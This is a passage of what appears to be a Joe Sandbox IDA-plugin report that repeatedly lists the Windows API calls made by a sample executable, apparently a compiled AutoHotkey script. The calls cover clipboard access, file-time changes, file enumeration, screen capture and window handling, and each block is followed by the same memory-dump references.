      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00441140: _strncpy.LIBCMT ref: 00441254
      • Part of subcall function 00441140: SystemTimeToFileTime.KERNEL32(?,?,?,004987E9), ref: 00441299
      • Part of subcall function 00441140: LocalFileTimeToFileTime.KERNEL32(?,?,?,004987E9), ref: 004412AD
      • Part of subcall function 00441140: GetLastError.KERNEL32(?,004987E9), ref: 004412B7
      • Part of subcall function 00441140: GetSystemTimeAsFileTime.KERNEL32(?), ref: 004412FC
      • Part of subcall function 00441140: FindFirstFileA.KERNEL32(?,?,?,?,?,?,004987E9), ref: 004413B8
      • Part of subcall function 00441140: GetTickCount.KERNEL32(?,?,?,?,004987E9), ref: 004413D7
      • Part of subcall function 00441140: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004413FD
      • Part of subcall function 00441140: GetTickCount.KERNEL32(?,?,?,?,004987E9), ref: 00441413
      • Part of subcall function 00441140: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,22000000,00000000), ref: 004414CB
      • Part of subcall function 00441140: GetLastError.KERNEL32 ref: 004414D8
      • Part of subcall function 00441140: SetFileTime.KERNEL32(00000000,00000000,?,00000000), ref: 0044152D
      • Part of subcall function 00441140: GetLastError.KERNEL32 ref: 00441537
      • Part of subcall function 00441140: CloseHandle.KERNEL32(00000000), ref: 00441544
      • Part of subcall function 00441140: FindNextFileA.KERNEL32(?,00000010), ref: 0044155D
      • Part of subcall function 00441140: FindClose.KERNEL32(?), ref: 0044156C
      • Part of subcall function 00441140: FindFirstFileA.KERNEL32(?,?), ref: 004415A6
      • Part of subcall function 00441140: GetTickCount.KERNEL32 ref: 004415D0
      • Part of subcall function 00441140: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004415FA
      • Part of subcall function 00441140: GetTickCount.KERNEL32(?,?,?,?,?,?,004987E9), ref: 00441610
      • Part of subcall function 00441140: FindNextFileA.KERNEL32(00000000,00000010), ref: 004416BA
      • Part of subcall function 00441140: FindClose.KERNEL32(00000000), ref: 004416C9
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 0042D080: GetModuleHandleA.KERNEL32(user32,BlockInput,00427E02,004987E9), ref: 0042D09A
      • Part of subcall function 0042D080: GetProcAddress.KERNEL32(00000000), ref: 0042D0A1
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 004408E0: _strncpy.LIBCMT ref: 004409DE
      • Part of subcall function 004408E0: FindFirstFileA.KERNEL32(?,?), ref: 00440ABA
      • Part of subcall function 004408E0: GetTickCount.KERNEL32 ref: 00440AEA
      • Part of subcall function 004408E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00440B10
      • Part of subcall function 004408E0: GetTickCount.KERNEL32 ref: 00440B26
      • Part of subcall function 004408E0: SetFileAttributesA.KERNEL32(?,00000010), ref: 00440D7C
      • Part of subcall function 004408E0: GetLastError.KERNEL32 ref: 00440D86
      • Part of subcall function 004408E0: FindNextFileA.KERNEL32(?,00000010), ref: 00440DA3
      • Part of subcall function 004408E0: FindClose.KERNEL32(?), ref: 00440DB2
      • Part of subcall function 004408E0: FindFirstFileA.KERNEL32(?,?), ref: 00440DE5
      • Part of subcall function 004408E0: GetTickCount.KERNEL32 ref: 00440E10
      • Part of subcall function 004408E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00440E3A
      • Part of subcall function 004408E0: GetTickCount.KERNEL32 ref: 00440E50
      • Part of subcall function 004408E0: FindNextFileA.KERNEL32(?,00000010), ref: 00440EDC
      • Part of subcall function 004408E0: FindClose.KERNEL32(?), ref: 00440EEF
      • Part of subcall function 004408E0: __itow.LIBCMT ref: 00440F25
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00437340: GetForegroundWindow.USER32 ref: 00437434
      • Part of subcall function 00437340: IsIconic.USER32(00000000), ref: 00437441
      • Part of subcall function 00437340: GetWindowRect.USER32(00000000,?), ref: 00437455
      • Part of subcall function 00437340: ClientToScreen.USER32(00000000,?), ref: 0043746D
      • Part of subcall function 00437340: GetDC.USER32(00000000), ref: 004374DA
      • Part of subcall function 00437340: CreateCompatibleDC.GDI32(?), ref: 0043751D
      • Part of subcall function 00437340: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00437536
      • Part of subcall function 00437340: SelectObject.GDI32(?,00000000), ref: 00437550
      • Part of subcall function 00437340: BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0043757F
      • Part of subcall function 00437340: ReleaseDC.USER32(00000000,?), ref: 00437776
      • Part of subcall function 00437340: SelectObject.GDI32(?,?), ref: 0043778E
      • Part of subcall function 00437340: DeleteDC.GDI32(?), ref: 00437795
      • Part of subcall function 00437340: DeleteObject.GDI32(?), ref: 004377A4
      • Part of subcall function 00437340: GetPixel.GDI32(?,?,?), ref: 00437983
      • Part of subcall function 00437340: ReleaseDC.USER32(00000000,?), ref: 0043799F
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
      • Part of subcall function 004392C0: IsWindowVisible.USER32(000601DA), ref: 004393DA
      • Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000005), ref: 004393F3
      • Part of subcall function 004392C0: IsIconic.USER32(000601DA), ref: 004393FC
      • Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000009), ref: 0043940E
      • Part of subcall function 004392C0: GetForegroundWindow.USER32 ref: 00439410
      • Part of subcall function 004392C0: SetForegroundWindow.USER32(000601DA), ref: 00439421
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 0040A570: __Stoull.NTSTC_LIBCMT ref: 0040A58D
      • Part of subcall function 0040A570: __Stoull.NTSTC_LIBCMT ref: 0040A5A8
      • Part of subcall function 0040A570: __Stoull.NTSTC_LIBCMT ref: 0040ABD3
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00475400: GetForegroundWindow.USER32 ref: 00475427
      • Part of subcall function 00475400: IsWindowVisible.USER32(00000000), ref: 00475441
      • Part of subcall function 00475400: IsIconic.USER32(00000000), ref: 0047544C
      • Part of subcall function 00475400: ShowWindow.USER32(00000000,00000009), ref: 00475459
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
